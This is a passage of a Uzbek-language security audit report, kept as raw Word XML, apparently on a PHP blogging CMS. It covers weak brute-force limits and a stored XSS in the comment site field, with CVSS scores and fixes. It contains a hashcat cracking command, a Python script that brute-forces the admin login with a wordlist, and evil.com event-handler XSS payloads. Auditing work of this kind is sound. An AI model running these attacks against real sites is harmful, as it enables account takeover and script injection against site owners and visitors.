              <w:t xml:space="preserve">  &lt;salt&gt;&lt;![CDATA[abcdefghij]]&gt;&lt;/salt&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hashcat bilan crack:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  hashcat -m 110 "e10adc3949ba59abbe56e057f20f883e:abcdefghij" wordlist.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  (mode 110 = sha1(pass.salt) - moslashtirilishi kerak)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Agar passwords XML'da ochiq bo'lsa va oddiy parol ishlatilsa, bir necha daqiqada topiladi.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 password_hash(PASSWORD_BCRYPT) yoki password_hash(PASSWORD_ARGON2ID) ga o'tish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Mavjud parollarni keyingi login da yangi formatga migratsiya qilish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Minimum parol uzunligini oshirish (hozir 10 belgi, 16+ tavsiya etiladi)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Login urinishlarini cheklash (hozir 99 — juda ko'p, 5-10 ga tushirish kerak)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5. Brute Force Himoyasi Yetarli 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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E67E22" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-005] Brute Force Himoyasi Yetarli Emas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7E22"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/admin/auth.php — maxlogin konfiguratsiyasi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Brute force himoyasi sessiya-asosida va juda keng:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $maxlogin['counter'] = 99;    // 99 ta urinish!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $maxlogin['timer'] = 3 * 60; // 3 daqiqa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Muammolar:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. 99 ta urinish juda ko'p — zamonaviy standart 3-10 ta</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Sessiya-asosli: tajovuzkor har safar yangi sessiya ochsa (cookie'ni o'chirsa) limit reset bo'ladi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. IP-asosli bloklash yo'q — faqat sessiya kuzatiladi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Captcha optional va standart o'chiq</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Account lockout mexanizmi yo'q</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 Oddiy parollarga dictionary attack muvaffaqiyatli bo'lishi mumkin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Distributed brute force (har bir so'rovda yangi sessiya) limitni chetlab o'tadi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- "admin"/"admin", "admin"/"password123" kabi zaif parollar xavf ostida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PoC /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Python bilan sessiyasiz brute force:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  import requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  for password in wordlist:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    r = requests.post('http://target/core/admin/auth.php',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      data={'login':'admin','password':password,'token':get_token()},</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      allow_redirects=False)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if r.status_code == 302: print("Found:", password); break</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Har so'rovda yangi sessiya yaratilgani uchun 99 ta urinish limiti chetlanadi.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 maxlogin['counter'] ni 5 ga tushirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- IP-asosli bloklash qo'shish (fail2ban bilan integratsiya yoki PHP ichida)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Exponential backoff qo'shish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- CAPTCHA ni standart yoqilgan holda qo'yish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Account lockout (N marta xato keyin vaqtincha bloklash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6. Stored XSS via Comment "Site" Maydonida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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E67E22" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-006] Stored XSS via Comment "Site" Maydonida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7E22"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/lib/class.plx.motor.php:987, core/lib/class.plx.show.php:1239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Izoh qoldirishda "site" (veb-sayt) maydoni faqat URL validatsiyasidan o'tadi, lekin HTML-encode qilinmaydi. Chiqarishda esa HTML tegi ichida to'g'ridan-to'g'ri ishlatiladi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Saqlash (motor.php:987):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  $comment['site'] = (plxUtils::checkSite($content['site']) ? $content['site'] : '');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  checkSite() faqat:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  1. Qo'shtirnoq/birinchi tirnoqdan keyingi qismni o'chiradi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  2. URL regex'ga mosligini tekshiradi (https?|ftp protocol)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Chiqarish (plxShow:1239) — escaped QILINMAYDI:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  echo '&lt;a rel="nofollow" href="' . $site . '" title="' . $author . '"&gt;' . $author . '&lt;/a&gt;';</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Event-handler injection mumkin:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  https://evil.com/ onmouseover=alert(1) x=</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bu URL regex'dan o'tadi (https:// bor), lekin href atributini buzadi.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 Sayt sahifalarida persistent XSS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Tashrifchilarning browser'ida JavaScript ijro etiladi</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Cookie o'g'irlash, phishing, malware tarqatish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Admin saytni ko'rsa, admin sessiyasi ham xavf ostida</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Izohlarda ommaviy XSS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PoC /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1. Saytda izoh qoldirish (agar ochiq bo'lsa):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   Name: Test User</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   Site URL: https://evil.com/ onmouseover=alert(document.domain) foo=</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. checkSite() bu URL'ni qabul qiladi (https:// bor, bo'sh joy regex'da [$s] bilan bloklanadi)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Amalda: URL regex'dagi [^s] guruhi bo'sh joyni bloklaydi.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ammo title atributida author qiymati HTML-escape qilinmaydi:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   Agar author = '"&gt;&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   Lekin motor.php:982: $comment['author'] = plxUtils::strCheck(trim($content['name']));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   =&gt; author strCheck qilinadi, xavfsiz.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">REAL vektor: site maydoni URL'da XSS embeddable maxsus schemalar bilan (server config'ga bog'liq).</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 Chiqarishda (plxShow::comAuthor) site qiymatini htmlspecialchars() bilan encode qilish:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  echo '&lt;a href="' . htmlspecialchars($site, ENT_QUOTES) . '"&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Shu bilan birga URL'ni javascript: va data: schemalaridan tozalash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Content-Security-Policy headerini qo'shish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7. SQL Injection Yo'q — XML Ma'lumot Saqlash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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="3498DB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
